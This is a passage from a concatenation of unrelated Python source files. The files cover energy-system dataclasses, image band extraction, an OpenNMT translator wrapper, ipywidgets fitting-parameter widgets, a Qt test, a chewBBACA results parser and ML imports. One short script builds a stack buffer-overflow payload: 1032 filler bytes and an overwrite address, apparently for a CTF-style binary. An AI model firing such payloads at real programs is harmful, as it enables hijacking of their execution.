    eta_heat: Optional[float] = None  # heat recovery efficiency
@dataclass
class DeviceFuelCellData(dto.DeviceData):
    eta: Optional[float] = None  # efficiency
    eta_heat: Optional[float] = None  # heat recovery efficiency
@dataclass
class DeviceGasHeaterData(dto.DeviceData):
    pass
@dataclass
class DeviceGasTurbineData(dto.DeviceData):
    fuel_A: Optional[float] = None
    fuel_B: Optional[float] = None
    eta_heat: Optional[float] = None
    # is_on_init: bool = False
    # startup_cost: float = None
    # startup_delay: float = None # Minutes from activation to power delivery
    # shutdown_cost: float = None
    reserve_factor: float = 1  # unused capacity contributes fully to spinning reserve
@dataclass
class DeviceHeatPumpData(dto.DeviceData):
    eta: Optional[float] = None
@dataclass
class DevicePumpOilData(dto.DeviceData):
    eta: Optional[float] = None  # efficiency
@dataclass
class DevicePumpWaterData(dto.DeviceData):
    eta: Optional[float] = None
@dataclass
class DeviceSeparatorData(dto.DeviceData):
    el_demand_factor: Optional[float] = None  # electricity demand factor
    heat_demand_factor: Optional[float] = None  # heat demand factor
@dataclass
class DeviceSeparator2Data(dto.DeviceData):
    el_demand_factor: Optional[float] = None  # electricity demand factor
    heat_demand_factor: Optional[float] = None  # heat demand factor
@dataclass
class DeviceStorageHydrogenData(dto.DeviceData):
    E_max: float = 0  # MWh storage capacity (maximum stored energy)
    E_min: float = 0
    eta: float = 1  # efficiency
    target_profile: Optional[str] = None  # target profile for use of (seasonal) storage
    E_cost: float = 0  # cost for depleting storage
    E_init: float = 0
@dataclass
class DeviceWellProductionData(dto.DeviceData):
    wellhead_pressure: Optional[float] = None  # e.g. 2 MPa
@dataclass
class DeviceWellGasLiftData(dto.DeviceData):
    gas_oil_ratio: Optional[float] = None  # e.g. 500
    water_cut: Optional[float] = None  # e.g. 0.6
    f_inj: Optional[float] = None  # gas injection rate as fraction of production rate (e.g. 220)
    injection_pressure: Optional[float] = None  # e.g. 20 MPa
    separator_pressure: Optional[float] = None  # e.g. 2 MPa
@dataclass
class EdgeHeatData(dto.EdgeData):
    # Heat loss in MW as function of energy transfer in MW:
    power_loss_function: Optional[Tuple[List[float], List[float]]] = None
@dataclass
class EdgeHydrogenData(dto.EdgeData):
    bidirectional: bool = False
@dataclass
class EdgeFluidData(dto.EdgeData):
    # common parameters for fluid edges: wellstream, oil, water, gas
    pressure_from: Optional[float] = None
    pressure_to: Optional[float] = None
    diameter_mm: Optional[float] = None
    temperature_K: Optional[float] = None
    height_m: float = 0
    num_pipes: Optional[int] = None
    bidirectional: bool = False
    # allowable relative deviation of pressure from nominal values:
    pressure_from_maxdeviation: Optional[float] = None
    pressure_to_maxdeviation: Optional[float] = None
@dataclass
class EdgeGasData(EdgeFluidData):
    pass
@dataclass
class EdgeOilData(EdgeFluidData):
    pass
@dataclass
class EdgeWellstreamData(EdgeFluidData):
    pass
@dataclass
class EdgeWaterData(EdgeFluidData):
    pass
@dataclass
class CarrierHeatData(dto.CarrierData):
    """Heat carrier; no extra parameters beyond the base CarrierData."""

    pass
@dataclass
class CarrierHydrogenData(dto.CarrierData):
    """Hydrogen carrier parameters."""

    energy_value: float = 13  # MJ/Sm3 (calorific value) -> 13 MJ/Sm3
@dataclass
class CarrierGasData(dto.CarrierData):
    """Gas carrier parameters (trailing comments show typical values)."""

    co2_content: float  # kg/Sm3 - see SSB 2016 report -> 2.34 kg/Sm3
    G_gravity: float  # 0.6
    Pb_basepressure_MPa: float  # MPa -> 0.101 # MPa
    R_individual_gas_constant: float  # J/(kg K) -> 500 J/kgK
    Tb_basetemp_K: float  # K -> 288 K = 15 degC
    Z_compressibility: float  # 0.9
    energy_value: float  # MJ/Sm3 (calorific value) -> 40 MJ/Sm3
    k_heat_capacity_ratio: float  # 1.27
    rho_density: float  # kg/m3 -> 0.84 kg/m3
    pressure_method: Optional[str] = "weymouth"  # pressure drop calculation
@dataclass
class CarrierWellstreamData(dto.CarrierData):
    """Wellstream carrier parameters (trailing comments show typical values)."""

    darcy_friction: Optional[float] = None  # 0.02
    rho_density: Optional[float] = None  # kg/m3 -> 900 kg/m3
    viscosity: Optional[float] = None  # kg/(m s) -> 0.0026 kg/(m s)
    pressure_method: Optional[str] = None
    water_cut: Optional[float] = None
    gas_oil_ratio: Optional[float] = None
@dataclass
class CarrierOilData(dto.CarrierData):
    """Oil carrier parameters (trailing comments show typical values)."""

    darcy_friction: Optional[float] = None  # 0.02
    rho_density: Optional[float] = None  # kg/m3 -> 900 kg/m3
    viscosity: Optional[float] = None  # kg/(m s) -> 0.0026 kg/(m s)
    pressure_method: Optional[str] = "darcy-weissbach"  # pressure drop calculation
@dataclass
class CarrierWaterData(dto.CarrierData):
    """Water carrier parameters (trailing comments show typical values)."""

    darcy_friction: Optional[float] = None  # 0.02
    rho_density: Optional[float] = None  # kg/m3 -> 900 kg/m3
    viscosity: Optional[float] = None  # kg/(m s) -> 0.0026 kg/(m s)
    pressure_method: Optional[str] = "darcy-weissbach"  # pressure drop calculation
|
from processing_functions import color_stuff as mn
import cv2
import glob
from processing_functions import misc as msc
import os
# impath = "/home/kauevestena/data/extracted_images/2019-06-13-15-43-38/ngr/2419.jpg"
# outpath = "/home/kauevestena/data/extracted_images/transformed/teste_b.jpg"
# mn.save_one_band(impath,outpath)
# img = cv2.imread("/home/kauevestena/testes/CamVid/test/0001TP_007170.png")
# cv2.imshow("teste",img)
# cv2.waitKey(0)
# Extract individual bands from every JPEG frame in the source folders,
# writing each band as a PNG named by the frame number.
input_folders = [
    "/home/kaue/data/extracted_images/2019-07-11-16-21-46/ngr"
]
band_output_dirs = [
    "/home/kaue/data/extracted_images/nir_band",
    "/home/kaue/data/extracted_images/red_band",
]
for input_folder in input_folders:
    print(input_folder)
    for image_path in glob.glob(input_folder + "/*.jpg"):
        frame_id = msc.fileNumberFromPathAsStr(image_path)
        # channel 0 goes to the nir_band folder; the default channel to red_band
        mn.save_one_band(image_path, os.path.join(band_output_dirs[0], frame_id + '.png'), channel=0)
        mn.save_one_band(image_path, os.path.join(band_output_dirs[1], frame_id + '.png'))
msc.telegram_bot_sendtext("band extraction terminated")
from __future__ import print_function
from onmt.translate.translator import Translator as _Translator
import onmt.model_builder
import onmt.translate.beam_search
from onmt.translate import TranslationBuilder as _TransBuilder
import onmt.inputters as inputters
import onmt.decoders.ensemble
from pangeamt_toolkit.pangeanmt.onmtx_translation import OnmtxTranslation
class OnmtxTranslator(_Translator):
    """Translator variant that returns lightweight ``OnmtxTranslation``
    objects (best hypothesis, attention, score) instead of writing output."""

    def translate(self, src, with_attn=True, batch_size=None, phrase_table=""):
        """Translate the examples in ``src`` and return a list of
        :class:`OnmtxTranslation`.

        Parameters
        ----------
        src : source examples fed to ``self.src_reader`` via an
            :class:`inputters.Dataset`.
        with_attn : bool
            When True, attention is requested from ``translate_batch``.
        batch_size : int
            Required; a ``ValueError`` is raised when it is None.
        phrase_table : str
            NOTE(review): accepted but never used — the builder below is
            given ``self.phrase_table`` instead; confirm whether this
            parameter should be forwarded.
        """
        src_dir = None
        attn_debug = False
        if with_attn:
            attn_debug = True
        if batch_size is None:
            raise ValueError("batch_size must be set")
        data = inputters.Dataset(
            self.fields,
            readers=([self.src_reader]),
            data=[("src", src)],
            dirs=[src_dir],
            sort_key=inputters.str2sortkey[self.data_type],
            filter_pred=self._filter_pred,
        )
        # Deterministic iteration: no sorting/shuffling so results line up
        # with the input order.
        data_iter = inputters.OrderedIterator(
            dataset=data,
            device=self._dev,
            batch_size=batch_size,
            train=False,
            sort=False,
            sort_within_batch=False,
            shuffle=False,
        )
        # Translate
        xlation_builder = _TransBuilder(
            data,
            self.fields,
            self.n_best,
            self.replace_unk,
            None,
            self.phrase_table,
        )
        results = []
        for batch in data_iter:
            batch_data = self.translate_batch(
                batch, data.src_vocabs, attn_debug
            )
            translations = xlation_builder.from_batch(batch_data)
            for translation in translations:
                # Keep only the 1-best hypothesis per source sentence.
                simple_translation = OnmtxTranslation(
                    translation.src,
                    translation.src_raw,
                    translation.pred_sents[0],
                    translation.attns[0],
                    translation.pred_scores[0],
                )
                results.append(simple_translation)
        return results
|
from __future__ import (absolute_import, division, print_function)
import lmfit
import traitlets
import ipywidgets as ipyw
import weakref
from qef.io import log_qef
class ParameterWidget(ipyw.Box):
    r"""One possible representation of a fitting parameter.
    Inherits from `ipywidgets.widgets.widget_box.Box <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget_box.py#L18>`_
    Parameters
    ----------
    show_header : Bool
        Hide or show names of the widget components `min`, `value`,...
    """ # noqa: E501
    def __init__(self, show_header=True):
        # Small helper: fixed-width, margin-less element layout dict.
        def el_ly(w):
            return dict(width='{}px'.format(w), margin='0px')
        # minimum block: checkbox "no lower bound" + editable lower bound
        self.nomin = ipyw.Checkbox(value=True, layout=el_ly(125))
        self.min = ipyw.FloatText(value=-float('inf'), layout=el_ly(165))
        box_ly = dict(border='1px solid black', display='flex', margin='0px',
                      flex_flow='row', width='290px')
        self.minbox = ipyw.Box([self.nomin, self.min], layout=box_ly)
        # value element
        self.value = ipyw.FloatText(value=0, layout=el_ly(170))
        # maximum block: checkbox "no upper bound" + editable upper bound
        self.nomax = ipyw.Checkbox(value=True, layout=el_ly(125))
        self.max = ipyw.FloatText(value=float('inf'), layout=el_ly(165))
        self.maxbox = ipyw.Box([self.nomax, self.max], layout=box_ly)
        # constraints block: vary flag + constraint expression
        self.vary = ipyw.Checkbox(value=True, layout=el_ly(125))
        self.expr = ipyw.Text(value='', continuous_update=False,
                              layout=el_ly(275))
        # array elements in an horizontal block
        self.elements = [self.minbox, self.value, self.maxbox,
                         self.vary, self.expr]
        # Header labels (widths mirror the element widths above)
        self.header = None
        if show_header is True:
            d_lbs = (('-inf', 125), ('min', 165), ('value', 170),
                     ('inf', 125), ('max', 165), ('vary', 125),
                     ('expression', 275))
            l_lbs = [ipyw.Label(k, layout=el_ly(v)) for (k, v) in d_lbs]
            box_ly = dict(display='flex', margin='0px', border='solid')
            self.header = ipyw.HBox(l_lbs, layout=box_ly)
        # Layout: a single row without header, or header + row stacked
        # in a column (note box_ly is mutated before the final super call).
        if self.header is None:
            box_ly = dict(display='flex', margin='0px', border='solid',
                          flex_flow='row')
            super(ParameterWidget, self).__init__(self.elements, layout=box_ly)
        else:
            box_ly = dict(display='flex', margin='0px', border='solid')
            b_els = ipyw.HBox(self.elements, layout=box_ly)
            box_ly.update({'flex_flow': 'column'})
            super(ParameterWidget, self).__init__([self.header, b_els],
                                                  layout=box_ly)
class ParameterCallbacksMixin(object):
    r"""Implement relationships between the different components of an
    ipywidget exposing all or some of the parameter attributes

    The methods in this Mixin expect attribute :code:`facade`,
    a dictionary whose keys coincide with tuple
    :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
    and whose values are either :code:`None` or references to ipywidgets.
    Attribute :code:`facade` can be created with
    function :func:`~qef.widgets.parameter.add_widget_facade`."""

    #: Representation of infinity value
    inf = float('inf')
    #: Valid keys of the :code:`facade` dictionary
    widget_names = ('nomin', 'min', 'value', 'nomax', 'max', 'vary', 'expr')

    def validate_facade(self):
        r"""Ascertain that keys of :code:`facade` attribute are contained in
        :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`"""
        fs = set(self.facade.keys())
        assert set(ParameterCallbacksMixin.widget_names).issuperset(fs)

    def initialize_callbacks(self):
        r"""Register callbacks to sync widget components"""
        self.validate_facade()
        for widget_name in self.facade:
            widget = self.facade[widget_name]
            if widget is not None:
                # e.g. widget 'min' is observed by method min_value_change
                callback = getattr(self, widget_name + '_value_change')
                widget.observe(callback, 'value', 'change')

    def nomin_value_change(self, change):
        r"""Set :code:`min` to :math:`-\infty` if :code:`nomin` is checked"""
        if 'min' in self.facade and change.new is True:
            if self.facade['min'].value > -self.inf:  # prevent cycles
                self.facade['min'].value = -self.inf

    def min_value_change(self, change):
        r"""Notify other widgets if :code:`min` changes.
        0. Reject change if :code:`min` becomes bigger than :code:`max`
        1. Uncheck :code:`nomin` if new value is entered in :code:`min`
        2. Update :code:`value.value` if it becomes smaller than
        :code:`min.value`"""
        f = self.facade
        if 'max' in f and change.new > f['max'].value:
            f['min'].value = change.old  # reject change
        else:  # Notify other widgets
            if 'nomin' in f and change.new > -self.inf:
                f['nomin'].value = False
            if 'value' in f and change.new > f['value'].value:
                f['value'].value = change.new

    def nomax_value_change(self, change):
        r"""Set :code:`max` to :math:`\infty` if :code:`nomax` is checked"""
        if 'max' in self.facade and change.new is True:
            if self.facade['max'].value < self.inf:  # prevent cycles
                self.facade['max'].value = self.inf

    def max_value_change(self, change):
        r"""Notify other widgets if :code:`max` changes.
        0. Reject change if :code:`max` becomes smaller than :code:`min`
        1. Uncheck :code:`nomax` if new value is entered in :code:`max`
        2. Update :code:`value.value` if it becomes bigger than
        :code:`max.value`"""
        f = self.facade
        if 'min' in f and change.new < f['min'].value:
            f['max'].value = change.old  # reject change
        else:  # Notify other widgets
            if 'nomax' in f and change.new < self.inf:
                f['nomax'].value = False
            if 'value' in f and change.new < f['value'].value:
                f['value'].value = change.new

    def value_value_change(self, change):
        r"""Validate :code:`value` is within bounds. Otherwise set
        :code:`value` as the closest bound value"""
        if 'min' in self.facade and change.new < self.facade['min'].value:
            self.facade['value'].value = self.facade['min'].value
        elif 'max' in self.facade and change.new > self.facade['max'].value:
            self.facade['value'].value = self.facade['max'].value

    def vary_value_change(self, change):
        r"""enable/disable editing of :code:`min`, :code:`max`, :code:`value`,
        and :code:`expr`"""
        for name in ('nomin', 'min', 'value', 'nomax', 'max', 'expr'):
            if name in self.facade:
                # bug fix: index with the loop variable `name`; the original
                # used the literal 'name', raising KeyError on first iteration
                self.facade[name].disabled = not change.new

    def expr_value_change(self, change):
        r"""enable/disable :code:`min`, :code:`max`, and :code:`value`"""
        if 'vary' in self.facade:
            self.facade['vary'].value = True if change.new == '' else False
def create_facade(widget, mapping=None):
    r"""Create :code:`facade` dictionary where keys are standard
    :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
    and whose values are simple ipywidgets that control the fitting
    parameter attributes denoted by the standard
    :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.

    Parameters
    ----------
    widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
    mapping : str, dict, or None
        if `str`, mapping denotes the widget name to be associated with
        the widget. If `dict`, then `mapping` values are attribute names
        of `widget`, referencing the simple ipywidgets to be associated
        to standard widget names. The widget names are the keys of `mapping`.
        If :code:`None`, an inspection of `widget` attributes will be performed,
        looking for names that coincide with standard widget names. If the
        inspection is unsuccessful, the widget will be associated with the
        standard widget name 'value' to represent the values taken by the
        fitting parameter.

    Returns
    -------
    facade : dict

    Raises
    ------
    KeyError
        If `mapping` (or any of its keys) is not a standard widget name.
    TypeError
        If `mapping` is neither a str, a dict, nor None.
    """  # noqa: E501
    names = ParameterCallbacksMixin.widget_names  # expected widget names
    if mapping is not None:
        if isinstance(mapping, str):
            # subscribing a non-composite widget
            # bug fix: an invalid name used to fall through and raise an
            # opaque UnboundLocalError at the return statement
            if mapping not in names:
                msg = '{} is not a valid widget name'.format(mapping)
                log_qef.error(msg)
                raise KeyError(msg)
            facade = {mapping: widget}
        elif isinstance(mapping, dict):
            k = set(mapping.keys())
            if k & set(names) != k:
                msg = 'mapping contains invalid widget names'
                log_qef.error(msg)
                raise KeyError(msg)
            facade = {name: widget.__dict__[wn]
                      for name, wn in mapping.items()}
        else:
            msg = 'mapping must be a str, a dict, or None'
            log_qef.error(msg)
            raise TypeError(msg)
    else:  # inspection
        facade = {name: widget.__dict__[name] for name in names
                  if name in widget.__dict__}
        if bool(facade) is False:
            facade = {'value': widget}
    return facade
def add_widget_facade(widget, mapping=None):
    r"""Attach a :code:`facade` dictionary to `widget` and return the widget.

    The facade maps standard
    :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`
    to the simple ipywidgets controlling the corresponding fitting
    parameter attributes; it is built by
    :func:`~qef.widgets.parameter.create_facade`.

    Parameters
    ----------
    widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
    mapping : str, dict, or None
        Forwarded verbatim to
        :func:`~qef.widgets.parameter.create_facade`; see that function
        for how each type is interpreted.

    Returns
    -------
    widget : :class:`~ipywidgets:ipywidgets.widgets.widget.Widget`
        Reference to input widget
    """  # noqa: E501
    widget.facade = create_facade(widget, mapping=mapping)
    return widget
def add_widget_callbacks(widget, mapping=None):
    r"""Extend the widget's type with
    :class:`~qef.widgets.parameter.ParameterCallbacksMixin`

    Parameters
    ----------
    widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
    mapping : str, dict, or None
        Accepted for signature symmetry with the other helpers; it is not
        used by this function (the callbacks read :code:`widget.facade`).
    """  # noqa: E501
    original_class = widget.__class__
    # Swap in an on-the-fly subclass so the mixin's callback methods are
    # added to this particular widget instance only.
    widget.__class__ = type(original_class.__name__,
                            (original_class, ParameterCallbacksMixin), {})
    widget.initialize_callbacks()
class ParameterWithTraits(lmfit.Parameter, traitlets.HasTraits):
    r"""Wrapper of :class:`~lmfit.parameter.Parameter` with
    :class:`~traitlets.TraitType` allows synchronization with ipywidgets

    Same signature for initialization as that of
    :class:`~lmfit.parameter.Parameter`.

    Parameters
    ----------
    name : str, optional
        Name of the Parameter.
    value : float, optional
        Numerical Parameter value.
    vary : bool, optional
        Whether the Parameter is varied during a fit (default is True).
    min : float, optional
        Lower bound for value (default is `-numpy.inf`, no lower bound).
    max : float, optional
        Upper bound for value (default is `numpy.inf`, no upper bound).
    expr : str, optional
        Mathematical expression used to constrain the value during the fit.
    brute_step : float, optional
        Step size for grid points in the `brute` method.
    user_data : optional
        User-definable extra attribute used for a Parameter.
    """
    #: :class:`~lmfit.parameter.Parameter` attribute names
    param_attrs = ('_val', 'min', 'max', 'vary', '_expr')
    #: :class:`~lmfit.parameter.Parameter` feature names
    param_features = ('value', 'min', 'max', 'vary', 'expr')
    #: :class:`~traitlets.TraitType` instances in sync with
    #: :class:`~lmfit.parameter.Parameter` attributes
    trait_names = ('tvalue', 'tmin', 'tmax', 'tvary', 'texpr')
    #: :class:`~traitlets.Float` traitlet wrapping
    #: :class:`~lmfit.parameter.Parameter` attribute :code:`_val`
    tvalue = traitlets.Float(allow_none=True)
    #: :class:`~traitlets.Float` traitlet wrapping
    #: :class:`~lmfit.parameter.Parameter` attribute :code:`min`
    tmin = traitlets.Float()
    #: :class:`~traitlets.Float` traitlet wrapping
    #: :class:`~lmfit.parameter.Parameter` attribute :code:`max`
    tmax = traitlets.Float()
    #: :class:`~traitlets.Bool` traitlet wrapping
    #: :class:`~lmfit.parameter.Parameter` attribute :code:`vary`
    tvary = traitlets.Bool()
    #: :class:`~traitlets.Unicode` traitlet wrapping
    #: :class:`~lmfit.parameter.Parameter` attribute :code:`_expr`
    texpr = traitlets.Unicode(allow_none=True)

    @classmethod
    def feature_to_trait(cls, feature):
        r"""From :class:`~lmfit.parameter.Parameter` feature name to
        :class:`~traitlets.TraitType` name"""
        try:
            return cls.trait_names[cls.param_features.index(feature)]
        # bug fix: tuple.index raises ValueError, not KeyError, so the
        # original handler was unreachable and nothing was ever logged
        except ValueError:
            msg = '{} is not a parameter feature'.format(feature)
            log_qef.error(msg)
            raise KeyError(msg)

    @classmethod
    def attr_to_trait(cls, attr):
        r"""From :class:`~lmfit.parameter.Parameter` attribute name to
        :class:`~traitlets.TraitType` name"""
        try:
            return cls.trait_names[cls.param_attrs.index(attr)]
        except ValueError:  # bug fix: tuple.index raises ValueError
            msg = '{} is not a parameter attribute'.format(attr)
            log_qef.error(msg)
            raise KeyError(msg)

    @classmethod
    def trait_to_attr(cls, name):
        r"""From :class:`~traitlets.TraitType` name to
        :class:`~lmfit.parameter.Parameter` attribute name"""
        try:
            return cls.param_attrs[cls.trait_names.index(name)]
        except ValueError:  # bug fix: tuple.index raises ValueError
            msg = '{} is not a valid trait'.format(name)
            log_qef.error(msg)
            raise KeyError(msg)

    def __init__(self, name=None, value=None, vary=True, min=-float('inf'),
                 max=float('inf'), expr=None, brute_step=None, user_data=None):
        kwargs = dict(name=name, value=value, vary=vary, min=min, max=max,
                      expr=expr, brute_step=brute_step, user_data=user_data)
        lmfit.Parameter.__init__(self, **kwargs)
        # Weak references so links do not keep discarded widgets alive
        self._widget_links = weakref.WeakSet()

    def __repr__(self):
        r"""String representation at debug level"""
        p_repr = super(ParameterWithTraits, self).__repr__()
        return '<ParameterWithTraits {}>'.format(p_repr)

    def __setattr__(self, key, value):
        r"""Setting attributes making sure :class:`~lmfit.parameter.Parameter`
        attributes and :class:`~traitlets.TraitType` stay in sync"""
        if key in ParameterWithTraits.param_attrs:
            # attribute of Parameter; mirror the change into its trait
            lmfit.Parameter.__setattr__(self, key, value)
            other_key = ParameterWithTraits.attr_to_trait(key)
            other_value = getattr(self, other_key)
            if value != other_value:  # prevent cycling
                traitlets.HasTraits.__setattr__(self, other_key, value)
        else:
            # attribute of HasTraits; mirror traits into Parameter attributes
            traitlets.HasTraits.__setattr__(self, key, value)
            if key in ParameterWithTraits.trait_names:
                other_key = ParameterWithTraits.trait_to_attr(key)
                other_value = getattr(self, other_key)
                if value != other_value:  # prevent cycling
                    lmfit.Parameter.__setattr__(self, other_key, value)

    def link_widget(self, widget, mapping=None):
        r"""Link the value of a single ipywidget to one trait, or the values
        of the element widgets of a composite ipywidget to different traits.
        The specific traits can be specified with the :code:`mapping` argument.

        Parameters
        ----------
        widget: `ipywidgets.widgets.widget.Widget <https://github.com/jupyter-widgets/ipywidgets/blob/v7.0.0a1/ipywidgets/widgets/widget.py#L238>`_
        mapping : str, dict, or None
            if `str`, :code:`mapping` denotes the widget name to be associated
            with the widget. If `dict`, then :code:`mapping` values are
            attribute names of `widget`, referencing the simple ipywidgets to
            be associated to standard
            :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
            The widget names are the keys of :code:`mapping`. If :code:`None`,
            an inspection of `widget` attributes will be performed,
            looking for names that coincide with standard
            :const:`~qef.widgets.parameter.ParameterCallbacksMixin.widget_names`.
            If the inspection is unsuccessful, the widget will be associated
            with the standard widget name 'value' to represent the values
            taken by the fitting parameter.
        """  # noqa: E501
        add_widget_facade(widget, mapping=mapping)
        add_widget_callbacks(widget, mapping=mapping)
        for pn, w in widget.facade.items():
            tname = self.feature_to_trait(pn)
            # skip widgets that are already linked to one of our traits
            if w not in [lnk.target[0] for lnk in self._widget_links]:
                lnk = traitlets.link((self, tname), (w, 'value'))
                self._widget_links.add(lnk)
|
import os
import sys
from PySide2 import QtWidgets
from sleap.gui.dialogs.filedialog import FileDialog
def test_non_native_dialog():
    """Check that FileDialog._non_native_if_set honours USE_NON_NATIVE_FILE.

    Bug fix: the original restored USE_NON_NATIVE_FILE only when it was
    previously set, leaking "1" into the environment (and skipping the
    restore entirely on assertion failure). Restore in a finally block and
    remove the variable when it was originally absent.
    """
    save_env_non_native = os.environ.get("USE_NON_NATIVE_FILE", None)
    try:
        # Empty string: only Linux should force the non-native dialog.
        os.environ["USE_NON_NATIVE_FILE"] = ""
        d = dict()
        FileDialog._non_native_if_set(d)
        is_linux = sys.platform.startswith("linux")
        if is_linux:
            assert d["options"] == QtWidgets.QFileDialog.DontUseNativeDialog
        else:
            assert "options" not in d
        # Truthy value: non-native dialog on every platform.
        os.environ["USE_NON_NATIVE_FILE"] = "1"
        d = dict()
        FileDialog._non_native_if_set(d)
        assert d["options"] == QtWidgets.QFileDialog.DontUseNativeDialog
    finally:
        if save_env_non_native is not None:
            os.environ["USE_NON_NATIVE_FILE"] = save_env_non_native
        else:
            os.environ.pop("USE_NON_NATIVE_FILE", None)
|
from PyQt5.QtWidgets import QWidget
from widgets import ImageButton
class SearchButton(ImageButton):
    """
    Search and download image button with personalized style sheet
    """

    def __init__(self, size: int = 28, parent: QWidget = None):
        # Square button built around the 'search-download' icon.
        super().__init__('search-download', size, size, parent)
        self.setToolTip('Search & Download')

    def initStyleSheet(self):
        self.setObjectName('SearchButton')
        # Borderless look with a subtle translucent hover highlight.
        style = ('#SearchButton{border: none; padding: 1px;} '
                 '#SearchButton:hover{background: rgba(0, 0, 0, 10%);}')
        self.setStyleSheet(style)
import struct
def dq(v):
    """Pack integer *v* as a native-order unsigned 64-bit quadword."""
    return struct.pack("Q", v)
# Build the payload file: 1032 filler bytes, then 0x400616 packed as a
# native unsigned 64-bit value (presumably overwriting a saved return
# address — confirm the offset against the target binary).
with open("payload", "wb") as f:
    # bug fix: the file is opened in binary mode, so the filler must be
    # bytes — writing "A" * 1032 (str) raises TypeError on Python 3
    f.write(b"A" * 1032)
    f.write(dq(0x400616))
|
from bifrostlib import common
from bifrostlib.datahandling import Sample
from bifrostlib.datahandling import SampleComponentReference
from bifrostlib.datahandling import SampleComponent
from bifrostlib.datahandling import Category
from typing import Dict
import os
import json
import re
def extract_cgmlst(chewbbaca: Category, results: Dict, component_name: str) -> None:
    """Parse chewBBACA's allele-call table and record it in both the
    component results dict and the chewbbaca category report.

    Parameters
    ----------
    chewbbaca : Category
        Category object; the allele dict is appended to its report data.
    results : Dict
        Component results dict, keyed by the cleaned file name.
    component_name : str
        Folder (and component) name containing 'chewbbaca_results'.
    """
    output_folder = os.path.join(component_name, 'chewbbaca_results')
    # chewbacca output gets thrown into a folder called results_<yearmonthday>someothertext
    chewbbaca_output_folder = [i for i in os.listdir(output_folder) if re.match("results_[0-9]{6}.*", i)][0]
    file_name = os.path.join("chewbbaca_results", chewbbaca_output_folder, "results_alleles.tsv")
    file_key = common.json_key_cleaner(file_name)
    file_path = os.path.join(component_name, file_name)
    # renamed the file handle: the original shadowed the builtin input()
    with open(file_path) as allele_file:
        lines = [line.strip() for line in allele_file.readlines()]
    # Row 0 holds the locus names, row 1 the called alleles; the first
    # column of each row is the sample identifier, hence the [1:].
    allele_names = lines[0].split()[1:]
    allele_values = lines[1].split()[1:]
    allele_dict = dict(zip(allele_names, allele_values))
    results[file_key] = allele_dict
    chewbbaca['report']['data'].append({"alleles": allele_dict})
def datadump(samplecomponent_ref_json: Dict):
    """Build the 'chewbbaca' category for a sample component, store it on
    the component and (version permitting) on the sample, then mark the
    component as done.

    Parameters
    ----------
    samplecomponent_ref_json : Dict
        Serialized SampleComponentReference pointing at the component to
        process.
    """
    samplecomponent_ref = SampleComponentReference(value=samplecomponent_ref_json)
    samplecomponent = SampleComponent.load(samplecomponent_ref)
    sample = Sample.load(samplecomponent.sample)
    # Fresh category for this run; the report data is filled by extract_cgmlst
    chewbbaca = Category(value={
            "name": "chewbbaca",
            "component": {"id": samplecomponent["component"]["_id"], "name": samplecomponent["component"]["name"]},
            "summary": {"sequence_type": None},
            "report": {"data": []}
        }
    )
    extract_cgmlst(chewbbaca, samplecomponent["results"], samplecomponent["component"]["name"])
    samplecomponent.set_category(chewbbaca)
    sample_category = sample.get_category("chewbbaca")
    if sample_category is None:
        sample.set_category(chewbbaca)
    else:
        # Only overwrite the sample-level category when this component's
        # version is at least as new as the one already stored.
        current_category_version = extract_digits_from_component_version(chewbbaca['component']['name'])
        sample_category_version = extract_digits_from_component_version(sample_category['component']['name'])
        if current_category_version >= sample_category_version:
            sample.set_category(chewbbaca)
    common.set_status_and_save(sample, samplecomponent, "Success")
    # Sentinel file signalling to the workflow that datadump completed
    with open(os.path.join(samplecomponent["component"]["name"], "datadump_complete"), "w+") as fh:
        fh.write("done")
def extract_digits_from_component_version(component_str):
    """Return the digits of the '__v...__' version token as one int,
    e.g. 'chewbbaca__v1.0.5__xyz' -> 105."""
    version_token = re.match(r".*__(v.*)__.*", component_str).group(1)
    return int("".join(char for char in version_token if char.isdigit()))
# Script entry point: the `snakemake` object is injected into the module
# namespace by the Snakemake runtime when this file runs as a rule script.
datadump(
    snakemake.params.samplecomponent_ref_json,
)
|
import warnings

warnings.filterwarnings("ignore")  # NOTE: globally silences all warnings

# basic packages
import bisect
import os
import sys

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns

# feature selection packages
from mlxtend.feature_selection import ExhaustiveFeatureSelector as EFS
from scipy.stats import boxcox
from sklearn import linear_model, metrics, svm
from sklearn.decomposition import PCA
# bug fix: SelectFromModel lives in the public sklearn.feature_selection
# namespace; 'sklearn.feature_selection.from_model' is not importable
from sklearn.feature_selection import (RFECV, SelectFromModel, SelectKBest,
                                       VarianceThreshold, chi2)
from sklearn.model_selection import (cross_val_predict, cross_val_score,
                                     learning_curve, train_test_split,
                                     validation_curve)
from sklearn.preprocessing import (MinMaxScaler, PolynomialFeatures,
                                   StandardScaler)

# classification packages
from sklearn.ensemble import (AdaBoostClassifier, GradientBoostingClassifier,
                              RandomForestClassifier)
from sklearn.linear_model import LassoCV, LogisticRegression, Perceptron
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier

# regression packages
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.pipeline import Pipeline
def pcaPlot(df):
    """Plot cumulative explained variance vs. number of PCA components and
    return the number of components needed to reach 90% explained variance."""
    cumulative_var = np.cumsum(PCA().fit(df).explained_variance_ratio_)
    plt.plot(cumulative_var)
    plt.grid(True)
    plt.title('(PCA) Num. of Components vs. Cumulative explained variance')
    plt.xlabel('number of components')
    plt.ylabel('cumulative explained variance')
    plt.show()
    # leftmost component count whose cumulative explained variance >= 0.9
    return bisect.bisect_left(cumulative_var, 0.9)
def mrmr(x, y):
    """Rank features mRMR-style: relevance to the target (correlation,
